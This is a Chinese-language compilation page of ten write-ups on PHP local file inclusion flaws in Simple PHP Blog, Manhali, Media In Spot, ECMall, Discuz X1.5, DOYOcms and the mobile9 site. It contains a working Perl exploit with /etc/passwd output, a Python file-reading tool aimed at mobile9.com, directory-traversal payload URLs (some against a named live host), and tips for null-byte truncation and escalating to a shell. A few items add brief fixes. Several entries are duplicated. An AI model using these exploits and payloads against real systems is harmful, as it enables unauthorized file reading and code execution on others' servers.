“就酱咯”通过精心收集,向本站投稿了10篇Simple PHP Blog <= 0.5.1 本地文件包含缺陷,以下是小编为大家整理后的Simple PHP Blog <= 0.5.1 本地文件包含缺陷,仅供参考,欢迎大家阅读。
篇1:Simple PHP Blog <= 0.5.1 本地文件包含缺陷
=============================================
INTERNET SECURITY AUDITORS ALERT -005
- Original release date: March 2nd, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.8/10 (CVSS scored)
=============================================
I. VULNERABILITY
-------------------------
Simple PHP Blog <= 0.5.1 Local File Include vulnerability
II. BACKGROUND
-------------------------
Simple PHP Blog is a blog system does not requires database setup, and
is very easy to install.
III. DESCRIPTION
-------------------------
Simple PHP Blog <= 0.5.1 is affected by a Local File Include
vulnerability in languages_cgi.php due to parameter blog_language1
is not properly sanitized.
IV. PROOF OF CONCEPT
-------------------------
The affected code:
62 require_once(languages/ . $_POST[ blog_language1 ] .
/strings.php);
Exploit:
#!/usr/bin/perl
# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana isecauditors=dot=com
# Internet Security Auditors
use LWP::UserAgent;
if ($#ARGV < 3) { die(“Usage: $0
$ua = LWP::UserAgent->new;
$ua->agent(“Simple PHP Blog Exploit ^_^”);
$ua->default_header(Cookie =>“sid=$ARGV[3]”);
my $req = new HTTP::Request POST =>
“$ARGV[0]$ARGV[1]/languages_cgi.php”;
$req->content_type(application/x-www-form-urlencoded);
$req->content(“blog_language1=../../../../..$ARGV[2]%00”);
my $res = $ua->request($req);
if ($res->is_success) {
print $res->content;
} else {
print “Error: ” .$res->status_line, “”;
}
$ perl simple.pl example.com /blog /etc/passwd
root:*:0:0:root:/root:/bin/bash
The bug can be exploited with or without magic_quotes_gpc, but note
that if magic_quotes_gpc is set to Off, an attacker can view any file,
adding a character like /etc/passwd, if not only can include php
files, allowing to execute any local php files.
V. BUSINESS IMPACT
-------------------------
The impact is the attacker can read arbitrary files in the context of
the webserver and execute arbitrary local php scripts.
VI. SYSTEMS AFFECTED
-------------------------
Versions prior and including 0.5.1 are affected
In order to patch the application the function file_exists and
basename() must be added to the affected code.
VII. SOLUTION
-------------------------
Change line 62 of languages_cgi.php in order to filter $_POST[
blog_language1 ] variable.
if (ereg(^[a-zA-Z0-9_]+$, $_POST[ blog_language1 ]))
require_once(languages/ . $_POST[ blog_language1 ] . /strings.php);
VIII. REFERENCES
-------------------------
www.simplephpblog.com
sourceforge.net/projects/sphpblog/
www.isecauditors.com
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
-------------------------
March 02, 2009: Initial release.
December 18, 2009: Last revision.
XI. DISCLOSURE TIMELINE
-------------------------
March 02, 2009: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 03, 2009: Notified to developer. No response.
December 13, 2009: Notified again. No response.
December 18, 2009: Added mitigation solution and sent to lists.
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied “as-is”
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information
篇2:Manhali v1.8本地文件包含缺陷及修复
标题 Manhali v1.8 Local File Inclusion Vulnerability
程序开发: www.manhali.com/
下载地址: sourceforge.net/projects/manhali/files/manhali_1.8.zip/download
影响版本 : 1.8 (或许老版也受影响,未检查)
测试系统: Linux/Windows
############################################
# P.O.C :
/manhali/includes/download.php?f=../includes/dbconfig.php
############################################
# Greetz to my friendz
篇3:Media In Spot CMS本地文件包含缺陷及修复
#Name : Media In Spot LFI Vulnerability
#Date : May,16
#Vendor Url :http:www.mediainspot.com/
#Dork:“
”Powred By Media In Spot“”
#Author : wlhaan haker
#############################################################
Exploit:
server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################
Fix:
demo
/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
修复:过滤
篇4:mobile9 本地文件包含漏洞
因为他是base64编码的手工测试很麻烦就写了个小工具,高手飘过
import urllib2,sys
import httplib
import base64,time
if len(sys.argv) <= 2:
print “=” * 30
print “mobile9.com local exploit by cnb|rd Qq:441303228”
print “Email:Linuxrootkit@gmail.com”
print “=” * 30
print “usage: ” + sys.argv[0] + “ hostname ” + “ local file ”
sys.exit(1)
host = sys.argv[1]
path = sys.argv[2]
file = sys.argv[3]
h = httplib.HTTP(host)
h.putrequest(“HEAD”, path)
h.putheader(“Host”, host)
h.endheaders
okresp, reason, headers = h.getreply()
print “=” * 30
print host + “ Server Banner is ” + headers.get(“Server”)
print “=” * 30
print “Local file to read is ” + file
time = int(time.time())
serverpath = “/download/content_delivery.php?key=”
str = str(file) + “|” + str(time) + “|”
print str
base64file = base64.urlsafe_b64encode(str)
requestpath = serverpath + base64file
print base64file
print requestpath
f = httplib.HTTPConnection(host)
f.request('GET', requestpath)
print f.getresponse().read()
f.close
CSDN博客cnbird2008
篇5:ECMall本地文件包含漏洞
by Ryat
bbs.wolvez.org
respond.php 48行
$pay_code = !empty($_REQUEST['code']) ? trim($_REQUEST['code']) : '';
...
$plugin_file = ROOT_PATH . '/includes/payment/' . $pay_code . '.php';
if (is_file($plugin_file))
{
include_once($plugin_file);很明显的一个bug
利用的话可以参考flyh4t提到过[bbs.wolvez.org/topic/56/]的一个思路:
可以通过旁注拿个shell,然后写个main.php到/tmp目录下,然后包含之
篇6:media In Spot CMS本地文件包含缺陷及修复漏洞预警
#Name : Media In Spot LFI Vulnerability
#Date : May,16
#Vendor Url :http:www.mediainspot.com/
#Dork:“
”Powred By Media In Spot“”
#Author : wlhaan haker
#############################################################
Exploit:
server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################
Fix:
demo
www.badguest.cn/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
www.badguest.cn/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
www.badguest.cn/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
修复:过滤
篇7:DISCUZX1.5 本地文件包含漏洞漏洞预警
DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存,
config_global.php
$_config['cache']['type'] = 'file';
function cachedata($cachenames) {
......
$isfilecache = getglobal('config/cache/type') == 'file';
......
if($isfilecache) {
$lostcaches = array;
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.'./data/cache/cache_'.$cachename.'.php')) {
$lostcaches[] = $cachename;
}
}
......
}
地址:
localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
Authracation has expiried
执行了 api/uc.php 页面代码了,
篇8:DOYOcms 本地文件包含漏洞漏洞预警
这是这套CMS ,这个很简洁,。。
这里的$handle_controller = syClass($__controller, null, $GLOBALS['G_DY'][“controller_path”].'/'.$__controller.“.php”);
接下来往下看
这里的$sdir 没有经过任何过滤来的,然后看下这个import函数
这里直接包含了该文件
require($sfilename);所以结合前面的
$GLOBALS['G_DY'][“controller_path”].'/'.$__controller.“.php”
$__controller是我们可控的变量,也没有经过任何过滤,我们想可以通过%00截断,然后包含我们上传的文件就达到了目的
这也就是鸡肋的地方了,如果要截断,要保证php版本小于5.4(我自己也记不太清了) 因为高版本的修复了该截断的漏洞,
然后这里要保证魔术常量是关闭的。
下图就是成功包含的图
Exp:
localhost/test/index.php?c=../uploads//06/1.gif%00&a=type&tid=1
篇9:DISCUZ X1.5 本地文件包含漏洞
DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存, config_global.php $_config['cache']['type'] = ‘file’; function cachedata($cachenames) { …… $isfilecache = getglobal(‘config/cache/
DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。
config_global.php
$_config['cache']['type'] = ‘file’;
function cachedata($cachenames) {
……
$isfilecache = getglobal(‘config/cache/type’) == ‘file’;
……
if($isfilecache) {
$lostcaches = array;
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
$lostcaches[] = $cachename;
}
}
……
}
地址:
localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
执行了 api/uc.php 页面代码了,
篇10:include本地文件包含漏洞随想
by Ryat
www.wolvez.org
2008-2-22
引用:
本地文件包含漏洞是PHP中比较常见的漏洞,像下面的代码:
include(inc/.$_GET[a]./global.php);
这是个典型的文件包含漏洞,但要想包含任意文件的话需要引入NULL字符截断后面的/global.php,但在gpc为on的情况下null是会被转义的,这往往成了本地文件包含漏洞利用的束缚(在一些特定的情况下也可以用其他方法截断后面的代码,见:html“>www.wolvez.org/forum/thread-55-1-1.html)
其实文件包含分为include()和 require()两种,先看下手册中对这两种方式区别的描述:
这两种结构除了在如何处理失败之外完全一样,include() 产生一个警告而 require() 则导致一个致命错误。换句话说,如果想在遇到丢失文件时停止处理页面就用 require()。include() 就不是这样,脚本会继续运行
手册中对两种方式的区别说的很清楚,而include()的这种对待包含失败的处理方式有时会给我们在利用本地文件包含漏洞上提供一些其他的思路,看下下面的代码片断:
...
if (!empty($_COOKIE[”userlanguage“]) && file_exists(”lang/“ . basename($_COOKIE[”userlanguage“]) . ”/global.php“)) $language = $_COOKIE[”userlanguage“];
...
include_once(”lang/$language/index.php“);
...
$template = preg_replace(”/{langs+(.+?)}/ies“, ”languagevar(\1)“, $template);
...
fwrite($fp, $template);
...
function languagevar($var) {
if(isset($GLOBALS[lang][$var])) {
return $GLOBALS[lang][$var];
} else {
return ”!$var!“;
}
}
...
简单说下代码的处理流程,程序根据浏览者选择的语言把相应的$lang写进模板缓存,当浏览者访问时直接访问模板缓存,
而这里可以通过$_COOKIE[”userlanguage“]触发本地文件包含漏洞,这样提交:
../../[file][null char]/eng
通过basename()返回eng,而/lang/eng/global.php是存在的,绕过了file_exists()的检查,成功触发了本地文件包含漏洞,但这里需要GPC为OFF,因为要引入NULL字符截断后面的字符串。貌似利用很困难,但我们可以转换下思路,这里include_once()正确包含的话会包含语言文件,语言文件里面定义了$lang,这里是关键了,我们只要随便提交$_COOKIE[”userlanguage"],使include_once()无法正确包含,而前面提到include()即使包含失败,脚本依旧会向下执行,这样没有包含语言文件,$lang就是没有初始化的了,那么在register_globals为on或用了extract()的情况下,我们就可以自行提交$lang了,然后通过fwrite()写入了缓存文件:)
其实这个思路就是把include()本地文件包含漏洞转化为其他漏洞,是个典型的二次攻击:)
